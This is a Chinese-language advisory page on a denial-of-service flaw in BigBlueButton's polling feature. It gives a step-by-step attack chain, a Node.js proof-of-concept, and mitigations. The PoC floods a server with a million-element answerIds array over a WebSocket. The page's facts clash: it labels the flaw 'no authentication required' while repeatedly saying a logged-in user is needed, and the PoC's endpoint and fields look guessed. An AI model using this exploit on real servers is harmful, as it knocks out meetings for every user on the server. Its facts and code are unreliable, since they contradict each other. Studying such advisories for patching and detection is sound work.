CVE-2025-61601 BigBlueButton 投票功能拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-61601

漏洞类型

拒绝服务攻击（DoS）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

BigBlueButton

漏洞概述

CVE-2025-61601是BigBlueButton开源虚拟课堂平台中的一个高危拒绝服务（DoS）漏洞。该漏洞存在于3.0.13之前的所有版本中，攻击者可以通过滥用投票功能（Polling Feature）中的"Choices"（选项）响应类型来触发漏洞。具体而言，经过身份验证的用户通过提交一个包含巨大数组的恶意负载到`answerIds`字段中，可以导致当前会议乃至服务器上所有会议变得无响应，甚至使整个服务器崩溃或冻结。

BigBlueButton是一个广泛用于在线教育和远程会议的开源Web会议系统，全球众多教育机构和企业部署了该平台。该漏洞的CVSS 3.1评分为7.5分，属于高危级别，攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需权限（PR:N），无需用户交互（UI:N），对可用性影响为高（A:H），对机密性和完整性无影响。该漏洞已于2025年10月9日公开披露，发现者为GitHub安全顾问团队。

由于该漏洞允许单个经过身份验证的用户影响服务器上所有会议的正常运行，其影响范围可能非常广泛。对于依赖BigBlueButton提供在线教育或会议服务的大型组织而言，该漏洞可能导致服务全面中断，造成严重的业务影响。BigBlueButton团队已在3.0.13版本中发布了补丁修复该问题。

技术细节

该漏洞的核心位于BigBlueButton投票功能的"Choices"响应类型处理逻辑中。在正常的投票流程中，用户可以对投票问题进行选择回答，系统会将用户的选择存储在`answerIds`字段中。然而，该字段缺乏对输入数据大小的有效验证和限制。

攻击者利用此漏洞的步骤如下：首先，攻击者需要以合法用户身份登录到BigBlueButton会议中（无需管理员权限）；然后，攻击者利用投票功能，在提交投票响应时，通过API或客户端向`answerIds`字段注入一个包含海量元素的数组（例如包含数十万甚至数百万个ID的数组）；服务器端在处理该请求时，需要遍历和存储这个巨大的数组，导致内存资源被大量消耗，CPU使用率飙升，最终使服务器线程阻塞或内存耗尽。

由于BigBlueButton采用单实例多会议架构，一个会议的异常处理可能影响到运行在同一服务器上的所有其他会议。这种"水平影响"使得即使是低权限的普通用户也能对整个服务造成严重的可用性影响。该漏洞属于资源耗尽型DoS攻击，与传统的网络洪水攻击不同，它通过合法的应用层请求触发后端资源耗尽，因此难以通过常规的流量过滤或速率限制手段进行防御。

攻击链分析

STEP 1

步骤1：获取合法凭证

攻击者以普通用户身份注册并加入目标BigBlueButton会议，获取有效的用户认证令牌（token）。该漏洞仅需要普通用户权限，无需管理员权限。

STEP 2

步骤2：定位投票功能

攻击者在会议中等待或主动创建一个投票（Poll），并识别出投票的pollId以及投票响应所需的WebSocket或API端点。

STEP 3

步骤3：构造恶意负载

攻击者构造一个RespondToPollRequest请求，将answerIds字段填充为包含海量元素（如数十万到数百万个）的数组，远超正常投票响应的合理大小。

STEP 4

步骤4：发送恶意请求

攻击者通过WebSocket连接或HTTP API将恶意负载发送到BigBlueButton服务器，触发服务器端对超大数组的处理逻辑。

STEP 5

步骤5：服务器资源耗尽

服务器在处理该请求时尝试遍历和存储巨大数组，导致内存被大量占用、CPU资源耗尽，服务器线程阻塞，最终整个服务器失去响应。

STEP 6

步骤6：影响扩散

由于BigBlueButton的单实例多会议架构，服务器崩溃会影响该实例上托管的所有会议，导致所有用户的服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-61601 PoC - BigBlueButton Polling DoS via answerIds
// Vulnerability: Unbounded array in polling 'Choices' response causes DoS
// Affected: BigBlueButton < 3.0.13

const WebSocket = require('ws');
const https = require('https');

// Configuration
const BBB_SERVER = 'https://your-bbb-server.com/bigbluebutton';
const MEETING_ID = 'your-meeting-id';
const USER_TOKEN = 'your-auth-token'; // Authenticated user token

// Generate a massive array of answerIds to trigger resource exhaustion
function generateMaliciousPayload() {
    const MASSIVE_SIZE = 1000000; // 1 million entries to exhaust server resources
    const answerIds = new Array(MASSIVE_SIZE);

    for (let i = 0; i < MASSIVE_SIZE; i++) {
        answerIds[i] = i;
    }

    return {
        header: {
            name: 'RespondToPollRequest',
            meetingId: MEETING_ID,
            userId: USER_TOKEN
        },
        payload: {
            pollId: 'target-poll-id',
            answerIds: answerIds  // Malicious oversized array
        }
    };
}

// Send the malicious payload via WebSocket
async function exploit() {
    const payload = generateMaliciousPayload();
    const wsUrl = BBB_SERVER.replace('https://', 'wss://') + '/ws'; // WebSocket endpoint

    const ws = new WebSocket(wsUrl);

    ws.on('open', () => {
        console.log('[+] Connected to BigBlueButton server');
        console.log(`[+] Sending malicious payload with ${payload.payload.answerIds.length} answerIds...`);
        ws.send(JSON.stringify(payload));
        console.log('[+] Payload sent. Server should freeze/crash shortly.');
    });

    ws.on('error', (err) => {
        console.log(`[-] Error: ${err.message}`);
        console.log('[+] Server may have become unresponsive - DoS triggered!');
    });

    ws.on('close', () => {
        console.log('[+] Connection closed');
    });
}

exploit();

// Alternative: HTTP API approach
// POST /bigbluebutton/api/polls/respond
// Body: { "pollId": "xxx", "answerIds": [/* massive array */] }

影响范围

BigBlueButton < 3.0.13

防御指南

临时缓解措施

在无法立即升级到3.0.13版本的情况下，建议采取以下临时缓解措施：1）限制投票功能的使用权限，仅允许可信用户创建和参与投票；2）在反向代理（如Nginx）层面添加请求体大小限制，阻止包含超大answerIds数组的请求到达后端；3）实施用户级别的请求频率限制，检测异常的投票响应行为；4）监控服务器资源使用情况，设置自动告警机制；5）考虑临时禁用投票功能直到完成升级。请注意，这些措施仅为临时方案，升级到修复版本是唯一根本的解决方案。